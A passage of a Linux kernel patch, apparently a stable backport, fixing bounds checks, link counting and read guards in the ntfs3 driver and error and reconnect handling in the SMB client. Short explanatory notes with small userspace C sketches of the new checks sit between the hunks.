+ 			attr_b = ni_find_attr(ni, NULL, &le_b, ATTR_DATA, NULL,
+ 					      0, NULL, &mi_b);
+-			if (!attr_b)
+-				return -ENOENT;
++			if (!attr_b) {
++				err = -ENOENT;
++				goto out;
++			}
+ 
+ 			attr = attr_b;
+ 			le = le_b;
+@@ -1740,13 +1742,15 @@ int attr_allocate_frame(struct ntfs_inode *ni, CLST frame, size_t compr_size,
+ ok:
+ 	run_truncate_around(run, vcn);
+ out:
+-	if (new_valid > data_size)
+-		new_valid = data_size;
++	if (attr_b) {
++		if (new_valid > data_size)
++			new_valid = data_size;
+ 
+-	valid_size = le64_to_cpu(attr_b->nres.valid_size);
+-	if (new_valid != valid_size) {
+-		attr_b->nres.valid_size = cpu_to_le64(valid_size);
+-		mi_b->dirty = true;
++		valid_size = le64_to_cpu(attr_b->nres.valid_size);
++		if (new_valid != valid_size) {
++			attr_b->nres.valid_size = cpu_to_le64(valid_size);
++			mi_b->dirty = true;
++		}
+ 	}
+ 
+ 	return err;
+diff --git a/fs/ntfs3/attrlist.c b/fs/ntfs3/attrlist.c
+index 0c6a68e71e7d4..723e49ec83ce7 100644
+--- a/fs/ntfs3/attrlist.c
++++ b/fs/ntfs3/attrlist.c
+@@ -127,12 +127,13 @@ struct ATTR_LIST_ENTRY *al_enumerate(struct ntfs_inode *ni,
+ {
+ 	size_t off;
+ 	u16 sz;
++	const unsigned le_min_size = le_size(0);
+ 
+ 	if (!le) {
+ 		le = ni->attr_list.le;
+ 	} else {
+ 		sz = le16_to_cpu(le->size);
+-		if (sz < sizeof(struct ATTR_LIST_ENTRY)) {
++		if (sz < le_min_size) {
+ 			/* Impossible 'cause we should not return such le. */
+ 			return NULL;
+ 		}
+@@ -141,7 +142,7 @@ struct ATTR_LIST_ENTRY *al_enumerate(struct ntfs_inode *ni,
+ 
+ 	/* Check boundary. */
+ 	off = PtrOffset(ni->attr_list.le, le);
+-	if (off + sizeof(struct ATTR_LIST_ENTRY) > ni->attr_list.size) {
++	if (off + le_min_size > ni->attr_list.size) {
+ 		/* The regular end of list. */
+ 		return NULL;
+ 	}
+@@ -149,8 +150,7 @@ struct ATTR_LIST_ENTRY *al_enumerate(struct ntfs_inode *ni,
+ 	sz = le16_to_cpu(le->size);
+ 
+ 	/* Check le for errors. */
+-	if (sz < sizeof(struct ATTR_LIST_ENTRY) ||
+-	    off + sz > ni->attr_list.size ||
++	if (sz < le_min_size || off + sz > ni->attr_list.size ||
+ 	    sz < le->name_off + le->name_len * sizeof(short)) {
+ 		return NULL;
+ 	}
+diff --git a/fs/ntfs3/dir.c b/fs/ntfs3/dir.c
+index d4d9f4ffb6d9a..72cdfa8727d3c 100644
+--- a/fs/ntfs3/dir.c
++++ b/fs/ntfs3/dir.c
+@@ -309,11 +309,31 @@ static inline int ntfs_filldir(struct ntfs_sb_info *sbi, struct ntfs_inode *ni,
+ 		return 0;
+ 	}
+ 
+-	/* NTFS: symlinks are "dir + reparse" or "file + reparse" */
+-	if (fname->dup.fa & FILE_ATTRIBUTE_REPARSE_POINT)
+-		dt_type = DT_LNK;
+-	else
+-		dt_type = (fname->dup.fa & FILE_ATTRIBUTE_DIRECTORY) ? DT_DIR : DT_REG;
++	/*
++	 * NTFS: symlinks are "dir + reparse" or "file + reparse"
++	 * Unfortunately the reparse attribute is used for many purposes (several dozen).
++	 * It is not possible here to know whether this name is a symlink or not.
++	 * To get the exact type of the name we would have to open the inode (read the MFT).
++	 * getattr on an opened file (fstat) correctly reports a symlink.
++	 */
++	dt_type = (fname->dup.fa & FILE_ATTRIBUTE_DIRECTORY) ? DT_DIR : DT_REG;
++
++	/*
++	 * It is not reliable to detect the type of a name from the duplicated
++	 * information stored in the parent directory.
++	 * The only correct way to get the type of a name is to read the MFT
++	 * record and find ATTR_STD.
++	 * The code below is not a good idea: it takes additional locks and
++	 * does extra reads just to get the type of a name.
++	 * Should we use an additional mount option to enable the branch below?
++	 */
++	if ((fname->dup.fa & FILE_ATTRIBUTE_REPARSE_POINT) &&
++	    ino != ni->mi.rno) {
++		struct inode *inode = ntfs_iget5(sbi->sb, &e->ref, NULL);
++		if (!IS_ERR_OR_NULL(inode)) {
++			dt_type = fs_umode_to_dtype(inode->i_mode);
++			iput(inode);
++		}
++	}
+ 
+ 	return !dir_emit(ctx, (s8 *)name, name_len, ino, dt_type);
+ }
+@@ -495,11 +515,9 @@ static int ntfs_dir_count(struct inode *dir, bool *is_empty, size_t *dirs,
+ 	struct INDEX_HDR *hdr;
+ 	const struct ATTR_FILE_NAME *fname;
+ 	u32 e_size, off, end;
+-	u64 vbo = 0;
+ 	size_t drs = 0, fles = 0, bit = 0;
+-	loff_t i_size = ni->vfs_inode.i_size;
+ 	struct indx_node *node = NULL;
+-	u8 index_bits = ni->dir.index_bits;
++	size_t max_indx = ni->vfs_inode.i_size >> ni->dir.index_bits;
+ 
+ 	if (is_empty)
+ 		*is_empty = true;
+@@ -543,7 +561,7 @@ static int ntfs_dir_count(struct inode *dir, bool *is_empty, size_t *dirs,
+ 				fles += 1;
+ 		}
+ 
+-		if (vbo >= i_size)
++		if (bit >= max_indx)
+ 			goto out;
+ 
+ 		err = indx_used_bit(&ni->dir, ni, &bit);
+@@ -553,8 +571,7 @@ static int ntfs_dir_count(struct inode *dir, bool *is_empty, size_t *dirs,
+ 		if (bit == MINUS_ONE_T)
+ 			goto out;
+ 
+-		vbo = (u64)bit << index_bits;
+-		if (vbo >= i_size)
++		if (bit >= max_indx)
+ 			goto out;
+ 
+ 		err = indx_read(&ni->dir, ni, bit << ni->dir.idx2vbn_bits,
+@@ -564,7 +581,6 @@ static int ntfs_dir_count(struct inode *dir, bool *is_empty, size_t *dirs,
+ 
+ 		hdr = &node->index->ihdr;
+ 		bit += 1;
+-		vbo = (u64)bit << ni->dir.idx2vbn_bits;
+ 	}
+ 
+ out:
+diff --git a/fs/ntfs3/file.c b/fs/ntfs3/file.c
+index f31c0389a2e7d..14efe46df91ef 100644
+--- a/fs/ntfs3/file.c
++++ b/fs/ntfs3/file.c
+@@ -1110,6 +1110,8 @@ static ssize_t ntfs_compress_write(struct kiocb *iocb, struct iov_iter *from)
+ 	iocb->ki_pos += written;
+ 	if (iocb->ki_pos > ni->i_valid)
+ 		ni->i_valid = iocb->ki_pos;
++	if (iocb->ki_pos > i_size)
++		i_size_write(inode, iocb->ki_pos);
+ 
+ 	return written;
+ }
+diff --git a/fs/ntfs3/fslog.c b/fs/ntfs3/fslog.c
+index 710cb5aa5a65b..d53ef128fa733 100644
+--- a/fs/ntfs3/fslog.c
++++ b/fs/ntfs3/fslog.c
+@@ -465,7 +465,7 @@ static inline bool is_rst_area_valid(const struct RESTART_HDR *rhdr)
+ {
+ 	const struct RESTART_AREA *ra;
+ 	u16 cl, fl, ul;
+-	u32 off, l_size, file_dat_bits, file_size_round;
++	u32 off, l_size, seq_bits;
+ 	u16 ro = le16_to_cpu(rhdr->ra_off);
+ 	u32 sys_page = le32_to_cpu(rhdr->sys_page_size);
+ 
+@@ -511,13 +511,15 @@ static inline bool is_rst_area_valid(const struct RESTART_HDR *rhdr)
+ 	/* Make sure the sequence number bits match the log file size. */
+ 	l_size = le64_to_cpu(ra->l_size);
+ 
+-	file_dat_bits = sizeof(u64) * 8 - le32_to_cpu(ra->seq_num_bits);
+-	file_size_round = 1u << (file_dat_bits + 3);
+-	if (file_size_round != l_size &&
+-	    (file_size_round < l_size || (file_size_round / 2) > l_size)) {
+-		return false;
++	seq_bits = sizeof(u64) * 8 + 3;
++	while (l_size) {
++		l_size >>= 1;
++		seq_bits -= 1;
+ 	}
+ 
++	if (seq_bits != ra->seq_num_bits)
++		return false;
++
+ 	/* The log page data offset and record header length must be quad-aligned. */
+ 	if (!IS_ALIGNED(le16_to_cpu(ra->data_off), 8) ||
+ 	    !IS_ALIGNED(le16_to_cpu(ra->rec_hdr_len), 8))
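
The replacement check derives the expected sequence-number width directly from the log file size by counting its significant bits, instead of reconstructing an approximate size from seq_num_bits and comparing with slack. A stand-alone sketch of the computation (expected_seq_bits is an illustrative name):

#include <stdint.h>
#include <stdio.h>

static uint32_t expected_seq_bits(uint64_t l_size)
{
	uint32_t seq_bits = sizeof(uint64_t) * 8 + 3; /* 67 */

	while (l_size) {
		l_size >>= 1;
		seq_bits -= 1;
	}
	return seq_bits;
}

int main(void)
{
	/* A 4 MiB log file (2^22 bytes) has 23 significant bits: 67 - 23 = 44. */
	printf("%u\n", expected_seq_bits(4ULL << 20));
	return 0;
}
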
+diff --git a/fs/ntfs3/fsntfs.c b/fs/ntfs3/fsntfs.c
+index 4b72bc7f12ca3..1eac80d55b554 100644
+--- a/fs/ntfs3/fsntfs.c
++++ b/fs/ntfs3/fsntfs.c
+@@ -976,6 +976,30 @@ static inline __le32 security_hash(const void *sd, size_t bytes)
+ 	return cpu_to_le32(hash);
+ }
+ 
++/*
++ * Simple wrapper for sb_bread_unmovable.
++ */
++struct buffer_head *ntfs_bread(struct super_block *sb, sector_t block)
++{
++	struct ntfs_sb_info *sbi = sb->s_fs_info;
++	struct buffer_head *bh;
++
++	if (unlikely(block >= sbi->volume.blocks)) {
++		/* prevent generic message "attempt to access beyond end of device" */
++		ntfs_err(sb, "try to read out of volume at offset 0x%llx",
++			 (u64)block << sb->s_blocksize_bits);
++		return NULL;
++	}
++
++	bh = sb_bread_unmovable(sb, block);
++	if (bh)
++		return bh;
++
++	ntfs_err(sb, "failed to read volume at offset 0x%llx",
++		 (u64)block << sb->s_blocksize_bits);
++	return NULL;
++}
++
+ int ntfs_sb_read(struct super_block *sb, u64 lbo, size_t bytes, void *buffer)
+ {
+ 	struct block_device *bdev = sb->s_bdev;
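
The new ntfs_bread() rejects out-of-range blocks before calling into the block layer, so the log carries an ntfs-specific message instead of the generic "attempt to access beyond end of device". A rough userspace model of the guard; struct volume and volume_read_block are invented for illustration:

#include <stdint.h>
#include <stdio.h>

struct volume {
	uint64_t blocks;
	unsigned int blocksize;
	unsigned char *data;
};

static void *volume_read_block(struct volume *v, uint64_t block)
{
	if (block >= v->blocks) {
		fprintf(stderr, "try to read out of volume at offset 0x%llx\n",
			(unsigned long long)(block * v->blocksize));
		return NULL;
	}
	return v->data + block * v->blocksize;
}

int main(void)
{
	unsigned char buf[4 * 512] = { 0 };
	struct volume v = { .blocks = 4, .blocksize = 512, .data = buf };

	printf("%s\n", volume_read_block(&v, 2) ? "ok" : "rejected");
	printf("%s\n", volume_read_block(&v, 10) ? "ok" : "rejected");
	return 0;
}
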
+diff --git a/fs/ntfs3/inode.c b/fs/ntfs3/inode.c
+index dc937089a464a..42dd9fdaf4151 100644
+--- a/fs/ntfs3/inode.c
++++ b/fs/ntfs3/inode.c
+@@ -402,7 +402,6 @@ static struct inode *ntfs_read_mft(struct inode *inode,
+ 		goto out;
+ 
+ 	if (!is_match && name) {
+-		/* Reuse rec as buffer for ascii name. */
+ 		err = -ENOENT;
+ 		goto out;
+ 	}
+@@ -417,6 +416,7 @@ static struct inode *ntfs_read_mft(struct inode *inode,
+ 
+ 	if (names != le16_to_cpu(rec->hard_links)) {
+ 		/* Correct minor error on the fly. Do not mark inode as dirty. */
++		ntfs_inode_warn(inode, "Correct links count -> %u.", names);
+ 		rec->hard_links = cpu_to_le16(names);
+ 		ni->mi.dirty = true;
+ 	}
+diff --git a/fs/ntfs3/ntfs.h b/fs/ntfs3/ntfs.h
+index 0f38d558169a1..ba26a465b3091 100644
+--- a/fs/ntfs3/ntfs.h
++++ b/fs/ntfs3/ntfs.h
+@@ -517,12 +517,10 @@ struct ATTR_LIST_ENTRY {
+ 	__le64 vcn;		// 0x08: Starting VCN of this attribute.
+ 	struct MFT_REF ref;	// 0x10: MFT record number with attribute.
+ 	__le16 id;		// 0x18: struct ATTRIB ID.
+-	__le16 name[3];		// 0x1A: Just to align. To get real name can use bNameOffset.
++	__le16 name[];		// 0x1A: Just to align. To get real name can use name_off.
+ 
+ }; // sizeof(0x20)
+ 
+-static_assert(sizeof(struct ATTR_LIST_ENTRY) == 0x20);
+-
+ static inline u32 le_size(u8 name_len)
+ {
+ 	return ALIGN(offsetof(struct ATTR_LIST_ENTRY, name) +
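
With the fixed name[3] gone, sizeof(struct ATTR_LIST_ENTRY) no longer covers any part of the name, so every size check has to go through le_size(), as the attrlist.c hunk above now does. A userspace sketch of the size computation; the struct below only mimics the on-disk layout and is not the kernel definition:

#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define ALIGN8(x) (((x) + 7u) & ~7u)

struct attr_list_entry {
	uint32_t type;		/* 0x00 */
	uint16_t size;		/* 0x04 */
	uint8_t  name_len;	/* 0x06 */
	uint8_t  name_off;	/* 0x07 */
	uint64_t vcn;		/* 0x08 */
	uint64_t ref;		/* 0x10 */
	uint16_t id;		/* 0x18 */
	uint16_t name[];	/* 0x1A */
};

static uint32_t le_size(uint8_t name_len)
{
	return ALIGN8(offsetof(struct attr_list_entry, name) +
		      name_len * sizeof(uint16_t));
}

int main(void)
{
	printf("min entry: 0x%x\n", le_size(0));	/* 0x20, the old sizeof */
	printf("8-char name: 0x%x\n", le_size(8));	/* 0x30 */
	return 0;
}
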
+diff --git a/fs/ntfs3/ntfs_fs.h b/fs/ntfs3/ntfs_fs.h
+index 74482ef569ab7..0f9bec29f2b70 100644
+--- a/fs/ntfs3/ntfs_fs.h
++++ b/fs/ntfs3/ntfs_fs.h
+@@ -580,6 +580,7 @@ bool check_index_header(const struct INDEX_HDR *hdr, size_t bytes);
+ int log_replay(struct ntfs_inode *ni, bool *initialized);
+ 
+ /* Globals from fsntfs.c */
++struct buffer_head *ntfs_bread(struct super_block *sb, sector_t block);
+ bool ntfs_fix_pre_write(struct NTFS_RECORD_HEADER *rhdr, size_t bytes);
+ int ntfs_fix_post_read(struct NTFS_RECORD_HEADER *rhdr, size_t bytes,
+ 		       bool simple);
+@@ -1012,19 +1013,6 @@ static inline u64 bytes_to_block(const struct super_block *sb, u64 size)
+ 	return (size + sb->s_blocksize - 1) >> sb->s_blocksize_bits;
+ }
+ 
+-static inline struct buffer_head *ntfs_bread(struct super_block *sb,
+-					     sector_t block)
+-{
+-	struct buffer_head *bh = sb_bread(sb, block);
+-
+-	if (bh)
+-		return bh;
+-
+-	ntfs_err(sb, "failed to read volume at offset 0x%llx",
+-		 (u64)block << sb->s_blocksize_bits);
+-	return NULL;
+-}
+-
+ static inline struct ntfs_inode *ntfs_i(struct inode *inode)
+ {
+ 	return container_of(inode, struct ntfs_inode, vfs_inode);
+diff --git a/fs/ntfs3/record.c b/fs/ntfs3/record.c
+index ba336c7280b85..a8d4ed7bca025 100644
+--- a/fs/ntfs3/record.c
++++ b/fs/ntfs3/record.c
+@@ -226,11 +226,6 @@ struct ATTRIB *mi_enum_attr(struct mft_inode *mi, struct ATTRIB *attr)
+ 			return NULL;
+ 		}
+ 
+-		if (off + asize < off) {
+-			/* overflow check */
+-			return NULL;
+-		}
+-
+ 		attr = Add2Ptr(attr, asize);
+ 		off += asize;
+ 	}
+@@ -253,8 +248,8 @@ struct ATTRIB *mi_enum_attr(struct mft_inode *mi, struct ATTRIB *attr)
+ 	if ((t32 & 0xf) || (t32 > 0x100))
+ 		return NULL;
+ 
+-	/* Check boundary. */
+-	if (off + asize > used)
++	/* Check overflow and boundary. */
++	if (off + asize < off || off + asize > used)
+ 		return NULL;
+ 
+ 	/* Check size of attribute. */
+@@ -491,8 +486,20 @@ bool mi_remove_attr(struct ntfs_inode *ni, struct mft_inode *mi,
+ 		return false;
+ 
+ 	if (ni && is_attr_indexed(attr)) {
+-		le16_add_cpu(&ni->mi.mrec->hard_links, -1);
+-		ni->mi.dirty = true;
++		u16 links = le16_to_cpu(ni->mi.mrec->hard_links);
++		struct ATTR_FILE_NAME *fname =
++			attr->type != ATTR_NAME ?
++				NULL :
++				resident_data_ex(attr,
++						 SIZEOF_ATTRIBUTE_FILENAME);
++		if (fname && fname->type == FILE_NAME_DOS) {
++			/* Do not decrease links count deleting DOS name. */
++		} else if (!links) {
++			/* minor error. Not critical. */
++		} else {
++			ni->mi.mrec->hard_links = cpu_to_le16(links - 1);
++			ni->mi.dirty = true;
++		}
+ 	}
+ 
+ 	used -= asize;
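
The merged check in mi_enum_attr() folds the unsigned-overflow test into the boundary test, so a wrapped off + asize can never slip past either. A small demonstration; attr_fits is an invented name, and unsigned wraparound is well defined in C:

#include <stdint.h>
#include <stdio.h>

static int attr_fits(uint32_t off, uint32_t asize, uint32_t used)
{
	/* Check overflow and boundary in one pass, as the patch does. */
	if (off + asize < off || off + asize > used)
		return 0;
	return 1;
}

int main(void)
{
	printf("%d\n", attr_fits(0x100, 0x80, 0x400));		/* 1: fits */
	printf("%d\n", attr_fits(0x3f0, 0x80, 0x400));		/* 0: past end */
	printf("%d\n", attr_fits(0xfffffff0u, 0x20, 0x400));	/* 0: sum wraps */
	return 0;
}
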
+diff --git a/fs/ntfs3/xattr.c b/fs/ntfs3/xattr.c
+index df15e00c2a3a0..d98cf7b382bcc 100644
+--- a/fs/ntfs3/xattr.c
++++ b/fs/ntfs3/xattr.c
+@@ -217,6 +217,9 @@ static ssize_t ntfs_list_ea(struct ntfs_inode *ni, char *buffer,
+ 		if (!ea->name_len)
+ 			break;
+ 
++		if (ea->name_len > ea_size)
++			break;
++
+ 		if (buffer) {
+ 			/* Check if we can use field ea->name */
+ 			if (off + ea_size > size)
+diff --git a/fs/smb/client/cached_dir.c b/fs/smb/client/cached_dir.c
+index 6f4d7aa70e5a2..fd082151c5f9b 100644
+--- a/fs/smb/client/cached_dir.c
++++ b/fs/smb/client/cached_dir.c
+@@ -149,7 +149,7 @@ int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
+ 		return -EOPNOTSUPP;
+ 
+ 	ses = tcon->ses;
+-	server = ses->server;
++	server = cifs_pick_channel(ses);
+ 	cfids = tcon->cfids;
+ 
+ 	if (!server->ops->new_lease_key)
+diff --git a/fs/smb/client/cifsencrypt.c b/fs/smb/client/cifsencrypt.c
+index d0ac2648c0d61..d3d4cf6321fd5 100644
+--- a/fs/smb/client/cifsencrypt.c
++++ b/fs/smb/client/cifsencrypt.c
+@@ -444,7 +444,7 @@ static int calc_ntlmv2_hash(struct cifs_ses *ses, char *ntlmv2_hash,
+ 		len = cifs_strtoUTF16(user, ses->user_name, len, nls_cp);
+ 		UniStrupr(user);
+ 	} else {
+-		memset(user, '\0', 2);
++		*(u16 *)user = 0;
+ 	}
+ 
+ 	rc = crypto_shash_update(ses->server->secmech.hmacmd5,
+diff --git a/fs/smb/client/cifsglob.h b/fs/smb/client/cifsglob.h
+index 7f1aea4c11b9c..58bb54994e22a 100644
+--- a/fs/smb/client/cifsglob.h
++++ b/fs/smb/client/cifsglob.h
+@@ -86,7 +86,7 @@
+ #define SMB_INTERFACE_POLL_INTERVAL	600
+ 
+ /* maximum number of PDUs in one compound */
+-#define MAX_COMPOUND 5
++#define MAX_COMPOUND 7
+ 
+ /*
+  * Default number of credits to keep available for SMB3.
+diff --git a/fs/smb/client/fs_context.c b/fs/smb/client/fs_context.c
+index f4818599c00a2..4d5302b58b534 100644
+--- a/fs/smb/client/fs_context.c
++++ b/fs/smb/client/fs_context.c
+@@ -209,7 +209,7 @@ cifs_parse_security_flavors(struct fs_context *fc, char *value, struct smb3_fs_c
+ 
+ 	switch (match_token(value, cifs_secflavor_tokens, args)) {
+ 	case Opt_sec_krb5p:
+-		cifs_errorf(fc, "sec=krb5p is not supported!\n");
++		cifs_errorf(fc, "sec=krb5p is not supported. Use sec=krb5,seal instead\n");
+ 		return 1;
+ 	case Opt_sec_krb5i:
+ 		ctx->sign = true;
+diff --git a/fs/smb/client/readdir.c b/fs/smb/client/readdir.c
+index 2d75ba5aaa8ad..5990bdbae598f 100644
+--- a/fs/smb/client/readdir.c
++++ b/fs/smb/client/readdir.c
+@@ -304,14 +304,16 @@ cifs_dir_info_to_fattr(struct cifs_fattr *fattr, FILE_DIRECTORY_INFO *info,
+ }
+ 
+ static void cifs_fulldir_info_to_fattr(struct cifs_fattr *fattr,
+-				       SEARCH_ID_FULL_DIR_INFO *info,
++				       const void *info,
+ 				       struct cifs_sb_info *cifs_sb)
+ {
++	const FILE_FULL_DIRECTORY_INFO *di = info;
++
+ 	__dir_info_to_fattr(fattr, info);
+ 
+-	/* See MS-FSCC 2.4.19 FileIdFullDirectoryInformation */
++	/* See MS-FSCC 2.4.14, 2.4.19 */
+ 	if (fattr->cf_cifsattrs & ATTR_REPARSE)
+-		fattr->cf_cifstag = le32_to_cpu(info->EaSize);
++		fattr->cf_cifstag = le32_to_cpu(di->EaSize);
+ 	cifs_fill_common_info(fattr, cifs_sb);
+ }
+ 
+@@ -425,7 +427,7 @@ _initiate_cifs_search(const unsigned int xid, struct file *file,
+ 	} else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM) {
+ 		cifsFile->srch_inf.info_level = SMB_FIND_FILE_ID_FULL_DIR_INFO;
+ 	} else /* not srvinos - BB fixme add check for backlevel? */ {
+-		cifsFile->srch_inf.info_level = SMB_FIND_FILE_DIRECTORY_INFO;
++		cifsFile->srch_inf.info_level = SMB_FIND_FILE_FULL_DIRECTORY_INFO;
+ 	}
+ 
+ 	search_flags = CIFS_SEARCH_CLOSE_AT_END | CIFS_SEARCH_RETURN_RESUME;
+@@ -1019,10 +1021,9 @@ static int cifs_filldir(char *find_entry, struct file *file,
+ 				       (FIND_FILE_STANDARD_INFO *)find_entry,
+ 				       cifs_sb);
+ 		break;
++	case SMB_FIND_FILE_FULL_DIRECTORY_INFO:
+ 	case SMB_FIND_FILE_ID_FULL_DIR_INFO:
+-		cifs_fulldir_info_to_fattr(&fattr,
+-					   (SEARCH_ID_FULL_DIR_INFO *)find_entry,
+-					   cifs_sb);
++		cifs_fulldir_info_to_fattr(&fattr, find_entry, cifs_sb);
+ 		break;
+ 	default:
+ 		cifs_dir_info_to_fattr(&fattr,
+diff --git a/fs/smb/client/smb2pdu.c b/fs/smb/client/smb2pdu.c
+index c1fc1651d8b69..4c1231496a725 100644
+--- a/fs/smb/client/smb2pdu.c
++++ b/fs/smb/client/smb2pdu.c
+@@ -5010,6 +5010,9 @@ int SMB2_query_directory_init(const unsigned int xid,
+ 	case SMB_FIND_FILE_POSIX_INFO:
+ 		req->FileInformationClass = SMB_FIND_FILE_POSIX_INFO;
+ 		break;
++	case SMB_FIND_FILE_FULL_DIRECTORY_INFO:
++		req->FileInformationClass = FILE_FULL_DIRECTORY_INFORMATION;
++		break;
+ 	default:
+ 		cifs_tcon_dbg(VFS, "info level %u isn't supported\n",
+ 			info_level);
+@@ -5079,6 +5082,9 @@ smb2_parse_query_directory(struct cifs_tcon *tcon,
+ 		/* note that posix payload are variable size */
+ 		info_buf_size = sizeof(struct smb2_posix_info);
+ 		break;
++	case SMB_FIND_FILE_FULL_DIRECTORY_INFO:
++		info_buf_size = sizeof(FILE_FULL_DIRECTORY_INFO);
++		break;
+ 	default:
+ 		cifs_tcon_dbg(VFS, "info level %u isn't supported\n",
+ 			 srch_inf->info_level);
+diff --git a/fs/smb/client/transport.c b/fs/smb/client/transport.c
+index 8a1dd8407a3a7..df44acaec9ae9 100644
+--- a/fs/smb/client/transport.c
++++ b/fs/smb/client/transport.c
+@@ -427,10 +427,17 @@ __smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
+ 						  server->conn_id, server->hostname);
+ 	}
+ smbd_done:
+-	if (rc < 0 && rc != -EINTR)
++	/*
++	 * there's hardly any use for the layers above to know the
++	 * actual error code here. All they should do at this point is
++	 * to retry the connection and hope it goes away.
++	 */
++	if (rc < 0 && rc != -EINTR && rc != -EAGAIN) {
+ 		cifs_server_dbg(VFS, "Error %d sending data on socket to server\n",
+ 			 rc);
+-	else if (rc > 0)
++		rc = -ECONNABORTED;
++		cifs_signal_cifsd_for_reconnect(server, false);
++	} else if (rc > 0)
+ 		rc = 0;
+ out:
+ 	cifs_in_send_dec(server);
+@@ -449,8 +456,8 @@ smb_send_rqst(struct TCP_Server_Info *server, int num_rqst,
+ 	if (!(flags & CIFS_TRANSFORM_REQ))
+ 		return __smb_send_rqst(server, num_rqst, rqst);
+ 
+-	if (num_rqst > MAX_COMPOUND - 1)
+-		return -ENOMEM;
++	if (WARN_ON_ONCE(num_rqst > MAX_COMPOUND - 1))
++		return -EIO;
+ 
+ 	if (!server->ops->init_transform_rq) {
+ 		cifs_server_dbg(VFS, "Encryption requested but transform callback is missing\n");
+diff --git a/include/linux/fs.h b/include/linux/fs.h
+index 4a1911dcf834b..67313881f8ac1 100644
+--- a/include/linux/fs.h
++++ b/include/linux/fs.h
+@@ -337,6 +337,8 @@ enum rw_hint {
+ #define IOCB_NOIO		(1 << 20)
+ /* can use bio alloc cache */
+ #define IOCB_ALLOC_CACHE	(1 << 21)
++/* kiocb is a read or write operation submitted by fs/aio.c. */
++#define IOCB_AIO_RW		(1 << 23)
+ 
+ struct kiocb {
+ 	struct file		*ki_filp;
+diff --git a/include/linux/memblock.h b/include/linux/memblock.h
+index 50ad19662a322..6790f08066b72 100644
+--- a/include/linux/memblock.h
++++ b/include/linux/memblock.h
+@@ -118,6 +118,8 @@ int memblock_reserve(phys_addr_t base, phys_addr_t size);
+ int memblock_physmem_add(phys_addr_t base, phys_addr_t size);
+ #endif
+ void memblock_trim_memory(phys_addr_t align);
++unsigned long memblock_addrs_overlap(phys_addr_t base1, phys_addr_t size1,
++				     phys_addr_t base2, phys_addr_t size2);
+ bool memblock_overlaps_region(struct memblock_type *type,
+ 			      phys_addr_t base, phys_addr_t size);
+ int memblock_mark_hotplug(phys_addr_t base, phys_addr_t size);
+diff --git a/include/linux/socket.h b/include/linux/socket.h
+index b3c58042bd254..d79efd0268809 100644
+--- a/include/linux/socket.h
++++ b/include/linux/socket.h
+@@ -33,7 +33,10 @@ typedef __kernel_sa_family_t	sa_family_t;
+ 
+ struct sockaddr {
+ 	sa_family_t	sa_family;	/* address family, AF_xxx	*/
+-	char		sa_data[14];	/* 14 bytes of protocol address	*/
++	union {
++		char sa_data_min[14];		/* Minimum 14 bytes of protocol address	*/
++		DECLARE_FLEX_ARRAY(char, sa_data);
++	};
+ };
+ 
+ struct linger {
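
sa_data becomes a union of the legacy fixed 14-byte array and a flexible array at the same offset, so fortified string/memory helpers see a properly bounded destination while existing users keep the old view. A compilable model of the idiom; my_sockaddr is illustrative, and the empty struct mirrors what the kernel's DECLARE_FLEX_ARRAY() expands to (a GCC/Clang extension):

#include <stdio.h>
#include <string.h>

struct my_sockaddr {
	unsigned short sa_family;
	union {
		char sa_data_min[14];	/* legacy fixed-size view */
		struct {
			struct { } __empty_sa_data; /* keeps offset 0 in the union */
			char sa_data[];	/* bounded flexible view */
		};
	};
};

int main(void)
{
	struct my_sockaddr sa = { .sa_family = 2 };

	memcpy(sa.sa_data_min, "hi", 3);
	/* Both names alias the same storage. */
	printf("size=%zu data=%s\n", sizeof(sa), sa.sa_data);
	return 0;
}
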
+diff --git a/include/linux/swap.h b/include/linux/swap.h
+index a18cf4b7c724c..add47f43e568e 100644
+--- a/include/linux/swap.h
++++ b/include/linux/swap.h
+@@ -571,6 +571,11 @@ static inline int swap_duplicate(swp_entry_t swp)
+ 	return 0;
+ }
+ 
++static inline int swapcache_prepare(swp_entry_t swp)
++{
++	return 0;
++}
++
+ static inline void swap_free(swp_entry_t swp)
+ {
+ }
+diff --git a/include/net/netfilter/nf_flow_table.h b/include/net/netfilter/nf_flow_table.h
+index dde4dd9c4012c..4a767b3d20b9d 100644
+--- a/include/net/netfilter/nf_flow_table.h
++++ b/include/net/netfilter/nf_flow_table.h
+@@ -274,8 +274,8 @@ nf_flow_table_offload_del_cb(struct nf_flowtable *flow_table,
+ 		flow_table->type->put(flow_table);
+ }
+ 
+-int flow_offload_route_init(struct flow_offload *flow,
+-			    const struct nf_flow_route *route);
++void flow_offload_route_init(struct flow_offload *flow,
++			     struct nf_flow_route *route);
+ 
+ int flow_offload_add(struct nf_flowtable *flow_table, struct flow_offload *flow);
+ void flow_offload_refresh(struct nf_flowtable *flow_table,
+diff --git a/include/net/switchdev.h b/include/net/switchdev.h
+index 7dcdc97c0bc33..a3d8f013adcd5 100644
+--- a/include/net/switchdev.h
++++ b/include/net/switchdev.h
+@@ -303,6 +303,9 @@ void switchdev_deferred_process(void);
+ int switchdev_port_attr_set(struct net_device *dev,
+ 			    const struct switchdev_attr *attr,
+ 			    struct netlink_ext_ack *extack);
++bool switchdev_port_obj_act_is_deferred(struct net_device *dev,
++					enum switchdev_notifier_type nt,
++					const struct switchdev_obj *obj);
+ int switchdev_port_obj_add(struct net_device *dev,
+ 			   const struct switchdev_obj *obj,
+ 			   struct netlink_ext_ack *extack);
+diff --git a/include/net/tcp.h b/include/net/tcp.h
+index 4c838f7290dd9..8ea1fba84eff9 100644
+--- a/include/net/tcp.h
++++ b/include/net/tcp.h
+@@ -2290,7 +2290,7 @@ struct tcp_ulp_ops {
+ 	/* cleanup ulp */
+ 	void (*release)(struct sock *sk);
+ 	/* diagnostic */
+-	int (*get_info)(const struct sock *sk, struct sk_buff *skb);
++	int (*get_info)(struct sock *sk, struct sk_buff *skb);
+ 	size_t (*get_info_size)(const struct sock *sk);
+ 	/* clone ulp */
+ 	void (*clone)(const struct request_sock *req, struct sock *newsk,
+diff --git a/include/scsi/scsi_device.h b/include/scsi/scsi_device.h
+index fdc31fdb612da..d2751ed536df2 100644
+--- a/include/scsi/scsi_device.h
++++ b/include/scsi/scsi_device.h
+@@ -100,10 +100,6 @@ struct scsi_vpd {
+ 	unsigned char	data[];
+ };
+ 
+-enum scsi_vpd_parameters {
+-	SCSI_VPD_HEADER_SIZE = 4,
+-};
+-
+ struct scsi_device {
+ 	struct Scsi_Host *host;
+ 	struct request_queue *request_queue;
